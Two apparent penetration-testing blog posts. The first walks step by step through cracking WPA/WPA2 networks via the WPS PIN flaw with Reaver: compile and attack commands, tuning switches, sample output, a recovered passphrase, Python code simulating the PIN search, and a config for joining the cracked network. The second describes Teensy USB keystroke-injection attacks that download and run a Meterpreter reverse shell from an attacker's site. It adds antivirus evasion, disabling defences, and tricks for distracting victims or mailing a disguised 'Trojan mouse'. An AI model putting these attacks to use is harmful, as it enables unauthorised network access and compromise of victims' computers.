A new tool was recently released to crack wifi networks. If you sat in on my previous wifi cracking discussion, you will remember that I said trying to crack WPA/WPA2 networks was largely going to be a futile effort, due to the time needed to brute-force even a short preshared key.
This new attack leverages the poor design and implementation of the Wifi Protected Setup (WPS) scheme. Rather than trying to brute-force a lengthy passphrase, we can recover the access point's WPS PIN in at most 11,000 guesses, and then have the access point hand us the preshared key.
WPS was intended to provide a "fast and easy" way to set up new clients on a wireless network. Rather than having to memorize a potentially lengthy passphrase, a new client could be given a simple 8-digit PIN (usually printed on the access point itself) which would authenticate it, and the access point would then pass the configuration information, including the WPA passphrase, to the client. Note that this attack only works against access points that accept PIN registration from an "external registrar", that is, from any client that presents the PIN over the air. The push-button method is not what is being attacked, since it requires someone to physically press the button on the AP, but many consumer APs support both methods and will accept a PIN-based WPS registration attempt at any time, without any kind of button-pushing.
The PIN is 8 digits long, so naively there are 10^8 (100,000,000) possible combinations, but poor design in the WPS protocol lets the attack cut that number dramatically. The registration exchange has the client prove knowledge of the PIN in two halves, and the AP's response (a NACK after message M4) reveals whether the first four digits were right before the second half is ever checked. That turns one 10^8 search into two independent searches of 10^4 (10,000) each. On top of that, the eighth digit is a checksum of the other seven, so the second half is really only 10^3 (1,000) guesses. Worst case is 10^4 + 10^3 = 11,000 attempts. Big change going from 100,000,000 permutations (10,000,000 once you account for the checksum) to 11,000!
Once the PIN has been discovered, the AP will GIVE you the WPA/WPA2 passphrase. The average time to crack a WPA network using this tool is 4-10 hours, depending on how quickly the AP answers each attempt and whether it rate-limits or temporarily locks WPS after failures.
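To make the keyspace arithmetic concrete, here is an added Python example (mine, not code from the post and not Reaver's): a toy access point in external-registrar mode that answers a PIN attempt the way the WPS registration exchange leaks it (a wrong first half is rejected before the second half is looked at), the WPS checksum rule for the eighth digit, and the two-phase search that never needs more than 11,000 attempts. The target PINs in the script are constructed sample values.

```python
"""Why WPS PIN brute force needs at most 11,000 guesses.

Added example, not the original post's code and not Reaver's. The toy AP
models only the information leak: the registration protocol tells the
attacker whether the first half of the PIN was right (NACK after M4)
before it ever checks the second half (NACK after M6).
"""
from __future__ import annotations


def wps_pin_checksum(first_seven: int) -> int:
    """Return the 8th (checksum) digit for a 7-digit WPS PIN.

    Digits are weighted 3,1,3,1,3,1,3 counting from the right; the checksum
    digit makes the weighted sum a multiple of 10 (the WPS PIN rule).
    """
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum."""
    return (len(pin) == 8 and pin.isdigit()
            and wps_pin_checksum(int(pin[:7])) == int(pin[7]))


class ToyRegistrarAP:
    """Stand-in for an AP that accepts PIN registration at any time.

    try_pin() answers the way the protocol leaks information: a wrong
    first half is rejected without the second half being examined.
    """

    def __init__(self, pin: str) -> None:
        if not is_valid_pin(pin):
            raise ValueError("AP PIN must be 8 digits with a valid checksum")
        self._first, self._second = pin[:4], pin[4:]
        self.attempts = 0  # one full registration exchange per call

    def try_pin(self, guess: str) -> tuple[bool, bool]:
        self.attempts += 1
        if guess[:4] != self._first:
            return False, False                     # NACK after M4
        return True, guess[4:] == self._second     # M6 decides the rest


def split_brute_force(ap: ToyRegistrarAP) -> str | None:
    """Recover the PIN in two phases: up to 10^4 guesses, then up to 10^3."""
    first_half = None
    for i in range(10_000):
        cand = f"{i:04d}"
        # Any second half will do while only the first half is being tested;
        # a valid checksum keeps every probe a well-formed PIN.
        probe = cand + "000" + str(wps_pin_checksum(int(cand + "000")))
        if ap.try_pin(probe)[0]:
            first_half = cand
            break
    if first_half is None:
        return None
    for j in range(1_000):
        three = f"{j:03d}"
        # Compute the checksum instead of guessing it: 1,000 tries, not 10,000.
        guess = first_half + three + str(wps_pin_checksum(int(first_half + three)))
        if ap.try_pin(guess)[1]:
            return guess
    return None


if __name__ == "__main__":
    for target in ("83382765", "99999995"):   # constructed sample PINs
        ap = ToyRegistrarAP(target)
        print(target, split_brute_force(ap), f"{ap.attempts} attempts")
```

The second PIN is the worst case for this search (first half 9999, second half 999), and it still falls in exactly 11,000 attempts; the first one, taken from the "Trying pin" lines further down, falls in 8,616. The checksum function also validates the PINs Reaver prints, so it is a quick way to sanity-check a PIN read off an AP label before typing it.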
First, download Reaver at http://code.google.com/p/reaver-wps/. Untar and compile:
tar -zxvf reaver-1.3.tar.gz
cd reaver-1.3/src
./configure && make && make install
Reaver needs very few parameters to run: just the interface and the MAC address of the access point to attack. I'll show you a few other switches to throw to speed things up and provide status messages.
For this demonstration, I will be using BackTrack 5 with an Alfa external USB wifi adapter.
First, we need a victim. I usually use the aircrack-ng suite to help out with this. First, put your wireless card in monitor mode:
root@bt:~# airmon-ng start wlan1
Interface Chipset Driver
wlan1 Realtek RTL8187L rtl8187 - [phy0]
(monitor mode enabled on mon0)
wlan0 Atheros AR2425 ath5k - [phy1]
Airmon has now created the interface mon0 as a monitoring device. Now it is time to hunt for a target, using airodump-ng:
root@bt:~# airodump-ng mon0
From this output, we can see two of my wireless networks, "notyournet" and "FBI Surveillance Van". The FBI network uses WPA2-Enterprise (as indicated by MGT under the AUTH column), so it wouldn't be a good target: there is no preshared key to recover. "notyournet" uses a preshared key (PSK under the AUTH column), and if it is a consumer-grade access point it likely supports WPS. Hopefully it supports external registrar mode! The aircrack-ng suite currently does not indicate whether a network is WPS-enabled, but other devices, such as my Android phone, will; later Reaver releases also ship a scanner, wash, that lists nearby APs advertising WPS. I use the two together to pare down my list of potential victims. Record the BSSID (MAC address) and channel (6) for this network.
At an absolute minimum, to run reaver we need to pass it the interface to use, and the BSSID of the access point:
root@bt:~# reaver -i mon0 -b A0:21:B7:7D:D0:6E
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from A0:21:B7:7D:D0:6E
[+] Associated with A0:21:B7:7D:D0:6E (ESSID: notyournet)
[+] 0.05% complete @ 2012-01-09 19:26:21 (2 seconds/attempt)
And we would just let this run until we're given the PSK for this network. Go play Call of Duty for a couple of hours and come back.
But this is too slow! Let's speed things up. Maybe we're not good at CoD...
When Reaver encounters problems, it will disassociate from the AP, scan the air and re-associate. Often this happens after too many bad WPS setup attempts: some access points will disassociate the client, some lock out WPS for a short amount of time. Waiting for a rescan of all the 802.11 channels every time is costly. Wouldn't it be nice if we could lock Reaver onto the channel and not waste time rescanning? Why, yes we can!
Use the -c (channel number) and --fixed options to lock Reaver onto the AP's channel. We can get the AP's channel from airodump. Just remember that there is a possibility the AP will hop if it decides the air is "dirty" and tries to find a clear channel. If it does, we won't be able to re-acquire the access point. We are trading flexibility for speed.
root@bt:~# reaver -i mon0 -b A0:21:B7:7D:D0:6E -c 6 --fixed
Use the --dh-small option to have Reaver use small Diffie-Hellman keys, which cuts the time the AP spends on the key exchange for each attempt. Some access points don't play well with small keys; if attempts stop getting responses after adding it, drop the option.
root@bt:~# reaver -i mon0 -b A0:21:B7:7D:D0:6E -c 6 --fixed --dh-small
I like progress messages, as I like to see what's going on and that the process hasn't locked up. Use -vv to specify very verbose mode:
root@bt:~# reaver -i mon0 -b A0:21:B7:7D:D0:6E -c 6 --fixed --dh-small -vv
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from A0:21:B7:7D:D0:6E
[+] Switching mon0 to channel 6
[+] Associated with A0:21:B7:7D:D0:6E (ESSID: notyournet)
[+] Trying pin 75102760
[+] Trying pin 20512767
[+] Trying pin 66752769
[+] Trying pin 83382765
[+] Trying pin 07602764
[+] Trying pin 76862762
[+] 0.05% complete @ 2012-01-09 19:39:46 (1 seconds/attempt)
[+] Trying pin 18712766
^C
[+] Session saved.
As you can see, verbose mode lets us know what's going on, and the fixed channel plus small DH keys have roughly halved the time per attempt (1 second instead of 2). One last feature is the resume option. Any interrupted attack can be resumed by using the -s option and specifying the save file. Save files are named after the MAC address of the AP, with the file extension .wpc:
root@bt:~# reaver -i mon0 -b A0:21:B7:7D:D0:6E -c 6 --fixed --dh-small -s A021B77DD06E.wpc
Once cracked, Reaver will report the PIN and Preshared Key for the target network:
[+] Key cracked in 4435 seconds
[+] WPS PIN: 'xxxxxxxx'
[+] WPA PSK: 'youcantcrackme'
[+] AP SSID: 'notyournet'
It's that easy. Now that we have the WPA PSK, we can write up a config file for wpa_supplicant, and join the network. Here is what a skeleton wpa_supplicant config file looks like:
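As an added example (mine, not the post's own config file), here is a small Python script that renders a minimal wpa_supplicant configuration for the recovered network. Rather than writing the passphrase into the file in the clear, it derives the 256-bit PSK the same way wpa_passphrase does (PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 iterations, 32 bytes) and stores that. The SSID and passphrase used in the main block are the ones from the Reaver output above; the control-socket path is an assumption that matches common Linux setups.

```python
"""Turn the recovered passphrase into a wpa_supplicant network block.

Added example, not the original post's config. The PSK derivation is the
one wpa_passphrase(8) performs for WPA/WPA2-PSK: PBKDF2-HMAC-SHA1 with the
passphrase as password, the SSID as salt, 4096 iterations, 32-byte output.
"""
import hashlib
import string


def wpa_psk(ssid: str, passphrase: str) -> str:
    """Return the 64-hex-character 256-bit PSK for this SSID/passphrase pair."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    if len(ssid.encode()) > 32:
        raise ValueError("SSID may be at most 32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               4096, 32).hex()


def _ssid_line(ssid: str) -> str:
    # wpa_supplicant accepts ssid="..." for plain printable names, or a bare
    # hex string for anything awkward (quotes, backslashes, non-ASCII).
    safe = set(string.ascii_letters + string.digits + string.punctuation + " ")
    safe -= {'"', "\\"}
    if all(ch in safe for ch in ssid):
        return f'\tssid="{ssid}"'
    return f"\tssid={ssid.encode().hex()}"


def wpa_supplicant_conf(ssid: str, passphrase: str) -> str:
    """Render a minimal config: control socket plus one WPA/WPA2-PSK network.

    Storing the derived PSK instead of psk="passphrase" keeps the recovered
    passphrase itself out of the file.
    """
    lines = [
        "ctrl_interface=/var/run/wpa_supplicant",   # assumed path
        "network={",
        _ssid_line(ssid),
        "\tproto=RSN WPA",           # accept WPA2 (RSN) or WPA
        "\tkey_mgmt=WPA-PSK",
        f"\tpsk={wpa_psk(ssid, passphrase)}",
        "}",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # SSID and passphrase as reported by the Reaver run above.
    print(wpa_supplicant_conf("notyournet", "youcantcrackme"), end="")
```

Write the output to a file and start the client with `wpa_supplicant -i wlan1 -c notyournet.conf`, then grab an address with `dhclient wlan1`. The hex PSK is what actually keys the association, so a config holding the derived PSK joins the network exactly as one holding the passphrase would.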
Last Updated on Friday, 27 January 2012 12:36
SET is the Social Engineering Toolkit, a framework that integrates closely with Metasploit and is used by penetration testers to carry out social engineering attacks such as the Teensy HID attack described below.
The benefit of SET is that it is menu driven, rapidly updatable and extendable, and integrates seamlessly with Metasploit.

Teensy is a small USB development board built around a microcontroller; all programming is done over its mini-USB port. Teensy is used mainly by hobbyists for various projects such as game controllers, rhythm-based door locks, and home automation.
What makes the Teensy board interesting for penetration testers is that it can be programmed to compromise a victim computer even if USB removable storage and AutoRun are disallowed by the organization. How can this be? We can configure Teensy to appear as a USB Human Interface Device (HID). Keyboards and mice are also in the HID category and are generally allowed by an organization. Once plugged in, Teensy sends a series of keystrokes to the operating system as if a user were typing very quickly (and without error), building our attack payload and then executing it.
What does this mean for us? We have a very small attack vector that can be easily camouflaged, plugged into a victim host, and used to own it in a matter of seconds, even if the host is configured to not allow USB thumb drives. The attack payload is limited only by our imagination, but generally it is used to download a pre-generated payload and execute it, such as a Meterpreter reverse HTTPS shell that has been run through msfvenom or msfencode.
SET will step you through all the necessary steps for building the Teensy PDE file and selecting and encoding a payload. It will even help with evasion techniques such as backdooring a known-good executable or running the payload through several encoders, and it will start up a Metasploit payload handler for you.

Attacking with Teensy is relatively simple: plug it into an open USB port. For the attack to succeed, the workstation must be unlocked, and the entire attack takes about 10-30 seconds, depending on the speed of the victim host, since the system has to create Registry entries, prepare itself for the new device, and so on. Once that is done, Teensy sends keystrokes to the desktop at about 65 characters per second. It begins by sending Ctrl+Esc, which opens the Windows Start menu, then types "CMD.EXE /c" in the Run box. Once a command prompt is open, it echoes a short VBScript one line at a time into a .vbs file and then executes it. Typically, SET will build a Teensy loader file that echoes out an HTTP downloader, which pulls a file from the attacker's website and executes it.

Don’t touch the keyboard, as it will continue to send keystrokes to whatever window currently has focus!
On the Metasploit host, it is best to set an AutoRunScript on the handler that immediately migrates the shell off the current process into a different common process and kills the x.exe process. It is best to use Teensy when nobody is looking, as this will show some desktop activity: a command prompt and the Run box opening. Use whatever excuse is necessary to get the victim to look away for a few seconds. Be creative! Engage the target in some conversation, show off a magic trick, or just don't shower for a few days.
What can we do with Teensy now that we have it set up for evil? Despite its small size, we can't really go around plugging a penny-sized chip with a USB cable sticking out of it into things... so how about we camouflage it?

Here is just a cheap mouse from Best Buy that I gutted. With a few additional lines of code, I can simulate cursor moves onscreen to make it appear as if the mouse functions. A clever attacker could play the role of a desktop support technician, or a fellow employee who thinks his mouse may be dead and wants to troubleshoot the problem to see if it's the mouse or the computer.
In fact, this is what Netragard did recently, but expanded the concept by installing a USB hub, Teensy, and USB flash drive, all within a Logitech mouse body (which they didn’t destroy like I did). With some reconnaissance, they found a suitable victim and sent him a “promotional” mouse with all the marketing accessories to make it look legit. Three days after they FedEx’d the mouse, they got a connection back from their target. Trojan Horse? No. Trojan MOUSE.
People may begin to get wise to the “dropped USB stick” gag, or workstations may be locked down to prevent using removable storage, but new and novel attack vectors can still be employed to keep this vector fresh.
Fortunately, we are not limited to just pulling down a Meterpreter payload with Teensy. Whatever can be sent via keyboard and mouse can be sent by Teensy. Add a user, stop Windows Firewall, open a browser and visit a malicious website, stop Antivirus. The possibilities are only limited by what evil we can imagine. With some basic electronics, programming, and soldering skill, a complete and robust “plug and pwn” kit can be developed. A cheap mouse with some..ahem… new hardware, gussied up to look cutting edge and sent as a promotion is sure to get a good response.
As user awareness increases and workstations become more secure by default, we as penetration testers must seek new attack vectors. Teensy helps accomplish this as it does not appear as removable storage media to the operating system. Linux and OS X will happily accept input from Teensy too! Work is being done on Teensy to make it a more robust attack tool: the Programmable HID USB Keystroke Dongle project provides libraries and code examples to create unique attacks. The Teensy USB development board can be purchased at http://www.pjrc.com/teensy/ .
Last Updated on Wednesday, 30 November 2011 10:09